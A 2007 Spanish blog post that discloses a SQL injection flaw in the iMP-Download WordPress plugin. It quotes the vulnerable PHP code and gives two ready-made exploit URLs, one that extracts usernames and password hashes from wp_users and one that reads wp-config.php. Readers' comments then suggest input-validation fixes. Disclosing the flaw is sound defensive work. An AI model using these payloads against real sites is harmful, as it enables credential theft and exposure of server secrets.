Eviten el uso del plugin iMP-Download para WordPress

Por: alex | 12 Noviembre 2007 | Ver comentarios |

Esta entrada que escribí meses atrás iba a quedar como borrador, pero visto las repercusiones en blogs hispanos sobre un supuesto nuevo problema de seguridad de WordPress, publico esta entrada porque el sitio afectado usaba este plugin — no tengo idea si esto tiene relación con el ataque que sufrió.

En las primeras líneas del plugin iMP-Download, se puede apreciar el siguiente código:

<?php
/*
Plugin Name: iMP Download
Version: 1.4.1
Plugin URI: http://www.inmypad.com/2007/01/wordpress-plugins-imp-download/
Author: Hardi P
Author URI: http://www.inmypad.com/
Description: Download manager for wordpress user featuring download count, force download, quicktag, members only, widgets, etc. Integrated with search engine to find your downloads easily and pagination on download list.
*/

if (isset($_GET['dl'])) {
	global $wpdb, $table_prefix;
	
	// require_once('../../../wp-blog-header.php');
	$option = get_option('iMP_Download_Option');
	
	$user_login = $_COOKIE['wordpressuser_' . COOKIEHASH];

	if ($option['dl_mo'] == 1 && !$user_login) {
		$login = get_settings('siteurl') . '/wp-login.php';
	?>
		<script type="text/javascript">
			var mo = confirm("Guest are not allowed to download!" + "\n" + "Press 'OK' to login/register or press 'CANCEL' to go back.")
			if (mo == true) {
				window.location = "<?php echo $login; ?>";
		    } else {
				window.location = document.referrer;
			}
		</script>
	<?php
		exit();
	}
	
	$dl_id = $_GET['dl'];
	$table_name = $table_prefix . 'imp_download';
	
	$wpdb->query("UPDATE $table_name SET dl_count=dl_count+1 WHERE dl_id='$dl_id'");
	
	$url = "SELECT dl_url FROM $table_name WHERE dl_id = $dl_id";
	$file = $wpdb->get_var($url);

	$file = str_replace(' ','%20',$file);
	$filename = basename($file);
	
	$mimetype = 'application/octet-stream';  // Set mime-type
	header("Pragma: "); // Leave blank for issues with IE
	header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
	header("Content-Type: $mimetype");
	if ($option['dl_fd'] == 1) {
		if (ini_get('allow_url_fopen') == 0 && !function_exists('curl_init')) {
			header('Location: '.$file.''); // Switch to normal download mode if allow_url_fopen is disabled and cURL is not available
		} else {
			header('Content-Disposition: attachment; filename='.basename($filename)); // Force download activated
		}
		
		if (ini_get('allow_url_fopen') == 1) {
			$file = fopen($file, "rb");
			fpassthru($file);
			exit();
		} elseif (function_exists('curl_init')) {
			$ch = curl_init();
			curl_setopt($ch, CURLOPT_URL, $file);
			curl_setopt($ch, CURLOPT_HEADER, 0);
			curl_exec ($ch);
			curl_close ($ch);
			exit();
		}
	} else {
		header('Location: '.$file.''); // Force download deactivated
		exit();
	}
}

Como se puede apreciar en las líneas 34 y 39, el parámetro dl no es validado adecuadamente; ésto permite que cualquier usuario pueda realizar ataques de inyección de SQL y hacer muchas cosas como:

* Obtener el usuario y contraseña de cualquier usuario
http://localhost/wp/?dl=0/**/UNION/**/ALL/**/SELECT/**/concat(user_login,0x2d,user_pass)/**/FROM/**/wp_users/**/WHERE/**/ID=1

* Si allow_url_fopen está habilitado, existe la posibilidad de descargar cualquier archivo del servidor (./wp-config.php)
http://localhost/wp/?dl=0/**/UNION/**/ALL/**/SELECT/**/0x2E2F77702D636F6E6669672E706870

Dada la gravedad del problema, es recomendable que desactiven — o corrijan — cuanto antes el mencionado plugin.

Tags: plugin, Seguridad, Sql Injection, Wordpress

Entradas relacionadas

menéame añadir a del.icio.us digg it

Comentarios | Escribe el tuyo →

1

cinefilo
12 de Noviembre de 2007, 01:50:46 pm

En la linea 11 podemos añadir una comprobación para ver si el dato es númerico, tal que así:
```
if (isset($_GET['dl']) && is_numeric($_GET['dl']) ) {
```
Puede valer , no?
2

cinefilo
12 de Noviembre de 2007, 01:55:48 pm

También se podría utilizar la función is_int:
```
if (isset($_GET['dl']) && s_int($_GET['dl']) ) { 
```
Cual crees que es mejor, esta última no?
3

alex
12 de Noviembre de 2007, 03:14:32 pm

La segunda opción me parece que evita más errores, aunque también se puede cambiar la línea 34 con:
```
$dl_id = (int) $_GET['dl'];
```
4

de mas
12 de Noviembre de 2007, 03:33:35 pm

Yo he usado esta última.

Gracias por publicarlo Alex!
5

cinefilo
12 de Noviembre de 2007, 04:17:08 pm

Hay opciones para elegir.

Gracia Alex por el aviso
6

melanie
27 de Junio de 2009, 09:12:14 am

no se q hacer quiero jugar y no puedo por q me aparese descarga ul pugin
mel

Puedes usar las etiquetas <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> . Para formatear código encierra el mismo entre elementos [lang]código[/lang], donde lang puede ser: css, javascript, php, html, csharp, vbnet, sql o code.

Deja un comentario

Acerca de esta entrada

Esta entrada fué publicada el Lunes, Noviembre 12th, 2007 a las 1:00 pm bajo Seguridad, Sql Injection, Web, Wordpress. Puedes seguir los comentarios de esta entrada mediante el feed RSS 2.0. También dejar un comentario, o hacer un trackback desde tu sitio.

Patrocinados

Divagaciones etílicas

Últimos comentarios

Melanie en Eviten el uso del plugin iMP-Download para WordPress
Franko S. en Office 2007 RTM
Franko S. en Office 2007 RTM
Sfas en Mejores prácticas en PHP
Daniel Alejandro en Descargas de la versión de prueba de Office 2007

Buayacorp

Diseño y Programación

Eviten el uso del plugin iMP-Download para WordPress

Entradas relacionadas

Comentarios | Escribe el tuyo →

Deja un comentario

Acerca de esta entrada

Patrocinados

Últimos comentarios

Sindicar

Minibanners